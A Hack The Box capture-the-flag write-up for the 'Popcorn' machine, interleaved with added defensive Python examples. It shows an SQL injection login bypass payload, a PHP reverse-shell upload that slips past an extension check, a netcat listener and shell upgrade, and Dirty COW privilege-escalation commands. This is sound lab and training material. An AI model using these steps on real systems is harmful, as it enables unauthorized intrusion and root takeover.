Hack The Box: Popcorn Write-up (#27)

This is my 27th box out of 42 boxes for OSCP preparation. I am doing my best to learn and master the key skills for my upcoming OSCP exam by writing this series of blogs. So let’s begin.

Reconnaissance

Run the nmapAutomator script to enumerate open ports and services running on those ports.

./nmapAutomator 10.10.10.6 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get back the following result:

---------------------Starting Nmap Quick Scan---------------------
# Nmap 7.80 scan initiated Wed Oct  7 21:12:50 2020 as: nmap -Pn -T4 --max-retries 1 --max-scan-delay 20 --defeat-rst-ratelimit --open -oN nmap/Quick_10.10.10.6.nmap 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up (0.010s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
---------------------Starting Nmap Basic Scan---------------------
# Nmap 7.80 scan initiated Wed Oct 7 21:12:51 2020 as: nmap -Pn -sCV -p22,80 -oN nmap/Basic_10.10.10.6.nmap 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up (0.012s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
----------------------Starting Nmap UDP Scan----------------------
# Nmap 7.80 scan initiated Wed Oct 7 21:12:59 2020 as: nmap -Pn -sU --max-retries 1 --open -oN nmap/UDP_10.10.10.6.nmap 10.10.10.6
Warning: 10.10.10.6 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.6
Host is up (0.0088s latency).
All 1000 scanned ports on 10.10.10.6 are open|filtered (968) or closed (32)

We have 2 ports open.

  • Port 22: running SSH, OpenSSH 5.1p1 Debian 6ubuntu2.
  • Port 80: running HTTP, Apache httpd 2.2.12 ((Ubuntu)).
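As an added example (not part of the original write-up), here is a small Python parser for Nmap's normal (-oN) output, the format nmapAutomator saves under nmap/. It pulls each port line into a record with its state, service and version string, so scans can be diffed over time; that is how a defender notices a new listener or an old banner such as OpenSSH 5.1p1 or Apache 2.2.12. The sample text is a constructed excerpt mirroring the scan above.

```python
import re

# Constructed excerpt in Nmap's normal (-oN) output format, mirroring the scan above.
SAMPLE_NMAP = """\
# Nmap 7.80 scan initiated Wed Oct  7 21:12:51 2020 as: nmap -Pn -sCV -p22,80 10.10.10.6
Nmap scan report for 10.10.10.6
Host is up (0.012s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# A port line is "<port>/<proto> <state> <service> [<version ...>]"; the version
# column is absent in a plain port scan and present once -sV has run.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap_normal(text):
    """Return one dict per port line: port, proto, state, service, version."""
    services = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if not m:
            continue  # banner, script output ("| ...") and summary lines
        port, proto, state, service, version = m.groups()
        services.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service,
            "version": (version or "").strip(),
        })
    return services


def open_ports(text):
    """Sorted (port, proto) pairs whose state is exactly 'open'."""
    return sorted((s["port"], s["proto"]) for s in parse_nmap_normal(text)
                  if s["state"] == "open")


def new_ports(baseline_text, current_text):
    """Ports open now that were not open in the baseline scan."""
    return sorted(set(open_ports(current_text)) - set(open_ports(baseline_text)))


if __name__ == "__main__":
    for s in parse_nmap_normal(SAMPLE_NMAP):
        print(s)
```

Feed it the saved nmap/Basic_*.nmap file from one week and the next; new_ports() returns whatever started listening in between.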

Before we begin, let’s make quick mental notes.

  • The SSH service has no associated exploits that give us an initial foothold, unless we find credentials during the enumeration phase and use them to log in.
  • Port 80 is likely to be our initial foothold. We enumerate the pages and look for hidden directories that contain sensitive information or an admin login page.

Service Enumeration

Port 80 (HTTP)

Visit the page.

Just a default test page. Checking the source of the page gives us no further information. Next, let’s run the dirsearch scan to brute force hidden directories.

python3 /opt/dirsearch/dirsearch.py -u http://10.10.10.6/ -e php,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We get back the following results.

The torrent/ directory seems interesting. Let’s access that directory.

We have a Torrent Hoster login page. I tested common and weak credentials, but none of them work.

Let’s test for the SQL injection in the username field.

admin' or '1'='1

Great! The injection works and we are authenticated as admin.
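To show why the payload above works, here is an added Python example (not code from the write-up or from Torrent Hoster) that builds the same kind of login check two ways against an in-memory SQLite table: once by pasting the username into the SQL string, and once with bound parameters. The table, column names and stored password are constructed for the example; Torrent Hoster's real schema is not on the page.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table standing in for the application's login table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct horse battery staple')")
    db.commit()
    return db


def vulnerable_sql(username, password):
    """String formatting: quotes in the input become part of the SQL syntax."""
    return ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
            % (username, password))


def login_vulnerable(db, username, password):
    """Returns the matched username, or None. Bypassable with admin' or '1'='1."""
    row = db.execute(vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_parameterized(db, username, password):
    """Bound parameters: the input is only ever data and cannot change the WHERE clause."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1'='1"
    print(vulnerable_sql(payload, "anything"))
    print("vulnerable    :", login_vulnerable(db, payload, "anything"))
    print("parameterized :", login_parameterized(db, payload, "anything"))
```

The resulting vulnerable query reads WHERE username = 'admin' or '1'='1' AND password = 'anything'; AND binds tighter than OR, so the username = 'admin' half alone satisfies the clause. The parameterized version compares the whole string admin' or '1'='1 as a username and finds nothing. A real application would of course also compare password hashes rather than plaintext; the example keeps plaintext only to stay short.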

Let’s click on the Upload tab, as it seems interesting and we may find a file upload vulnerability there.

Here I tried to upload image files but failed, as it only accepts files with the .torrent extension. So before we convert any file to the torrent extension, let’s check the Browse tab.

Here we have a torrent file named “Kali Linux”. Click on it to see what we have.

We have an option to edit the screenshots. Let’s see if we can upload any image file.

Yes, we can!

Exploitation

Now, we try to upload a PHP reverse shell payload file by appending “;.png” to the file name. You can download the PHP reverse shell payload from the Pentestmonkey site.

Note: Please update the IP address and port number in the payload to your attacker machine before you proceed.

Before we do that, let’s set up a listener in Kali Linux.

nc -nlvp 53

Now, upload the file to the target.

Then we intercept this request with Burp proxy and remove the “;.png” and forward the request.

We successfully uploaded the payload file.

Refresh the page.

We can see the error message “Image File Not Found!”. Right-click on it and open it in a new tab.

Go back to the listener and see if we get a shell.

Yes, we have a shell!
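The upload bypass above works because the application trusts the file name the browser (or Burp) sends. As an added example, not code from the write-up or from Torrent Hoster, here is a server-side validator in Python for a screenshot upload: it allows only image extensions, checks that the bytes actually begin with that image type's magic number, and throws away the client's name in favour of a random server-chosen one. The extension list, the magic-byte table and the sample files are constructed for the example.

```python
import os
import secrets

# Constructed allow-list for the screenshot upload and the bytes each type begins with.
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}
MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def validate_image_upload(filename, data):
    """Return a safe server-side file name for an accepted image, or raise ValueError.

    Every check runs on the server, so bypassing a browser-side check through an
    intercepting proxy changes nothing: "shell.php;.png" and "shell.php" both fail.
    """
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_EXT:
        raise ValueError("extension not allowed: %r" % ext)
    if not data.startswith(MAGIC[ext]):
        raise ValueError("content is not a %s image" % ext)
    # The client's name, and anything smuggled inside it, is never reused.
    return secrets.token_hex(16) + ext


def is_accepted(filename, data):
    """Boolean wrapper around validate_image_upload for the demo and tests."""
    try:
        validate_image_upload(filename, data)
        return True
    except ValueError:
        return False


# Constructed sample payloads: a minimal PNG header and a PHP stub.
PNG_STUB = MAGIC[".png"] + b"\x00" * 16
PHP_STUB = b"<?php echo 'hello'; ?>"

if __name__ == "__main__":
    for name, data in [("photo.png", PNG_STUB),
                       ("shell.php;.png", PHP_STUB),   # the trick used above
                       ("shell.php", PHP_STUB),        # after the proxy strips ';.png'
                       ("shell.png", PHP_STUB)]:       # PHP file simply renamed
        print(name, "->", "accepted" if is_accepted(name, data) else "rejected")
```

Magic bytes alone are not proof of a harmless file (a polyglot can carry a valid image header), so the upload directory should additionally sit outside the web root or have script execution disabled, and re-encoding the image with an image library before storing it is the stronger option.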

Let’s upgrade the shell to a fully interactive shell. Run the command below.

python -c 'import pty;pty.spawn("/bin/bash")'

Then press CTRL+Z to send the shell to the background. Next, type the command below and press Enter twice.

stty raw -echo;fg

Now we have a better shell with tab completion.

Grab the user.txt flag.

Privilege Escalation

Let’s check the kernel and OS version.

It is a very old kernel version, so it should be vulnerable to the Dirty COW vulnerability.

Let’s copy the exploit from here and paste it into a file named dirty.c on the target machine. Next, let’s do a quick review of the exploit code.

...
// Compile with:
// gcc -pthread dirty.c -o dirty -lcrypt
//
// Then run the newly create binary by either doing:
// "./dirty" or "./dirty my-new-password"
//
// Afterwards, you can either "su firefart" or "ssh firefart@..."
//
// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT!
// mv /tmp/passwd.bak /etc/passwd
...

The instructions are very clear. Let’s compile it.

gcc -pthread dirty.c -o dirty -lcrypt

We have successfully compiled the exploit without any errors. I have already given execute permission to the exploit. Next, let’s execute it.

./dirty firefart

If the exploit appears to hang, press CTRL+C. Then run the su command to switch to the user firefart with the password firefart.

We have successfully escalated our privileges to root.
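The exploit's own comments above say it rewrites /etc/passwd (keeping a backup in /tmp/passwd.bak) so that a new account, firefart, can su to root. As an added example, not from the write-up or from the exploit, here is a Python host-integrity check a defender would run: it parses passwd-style text, lists any UID-0 account other than root, flags entries whose password field holds a hash instead of the "x" shadow marker, and diffs the file against a known-good copy. Whether the file was edited by appending a line or by replacing root's own line, a UID-0 name other than root stands out. The sample file contents are constructed.

```python
SHADOW_MARKERS = ("x", "*", "!", "!!", "")


def parse_passwd(text):
    """Parse /etc/passwd-style text into dicts, skipping blanks, comments and malformed lines."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            continue  # a tampered file may also leave malformed lines behind
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def extra_root_accounts(text):
    """Names of UID-0 accounts other than root: the classic sign of a passwd rewrite."""
    return sorted(e["name"] for e in parse_passwd(text)
                  if e["uid"] == 0 and e["name"] != "root")


def hashes_in_passwd(text):
    """Accounts whose password field is a real hash rather than a shadow marker."""
    return sorted(e["name"] for e in parse_passwd(text)
                  if e["pw"] not in SHADOW_MARKERS)


def added_lines(baseline_text, current_text):
    """Lines present now but absent from the known-good copy (e.g. /tmp/passwd.bak)."""
    base = set(baseline_text.splitlines())
    return [line for line in current_text.splitlines() if line.strip() and line not in base]


# Constructed sample: a clean baseline and the same file after a root-account insertion.
BASELINE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
alice:x:1000:1000:alice,,,:/home/alice:/bin/bash
"""
TAMPERED = BASELINE + "firefart:$6$constructed$notarealhash:0:0:pwned:/root:/bin/bash\n"

if __name__ == "__main__":
    print("extra UID-0 accounts:", extra_root_accounts(TAMPERED))
    print("hashes stored in passwd:", hashes_in_passwd(TAMPERED))
    print("lines added vs baseline:", added_lines(BASELINE, TAMPERED))
```

On a live host, pass open("/etc/passwd").read() as the current text and a copy taken at build time as the baseline; on this box the exploit's own /tmp/passwd.bak would serve as that baseline.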

Grab the root.txt flag.

Attack Strategy Map

I have summarized the entire attack strategy on this map.

Thank you for reading :-) Next box is Secnotes.

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.

Joshua Surendran
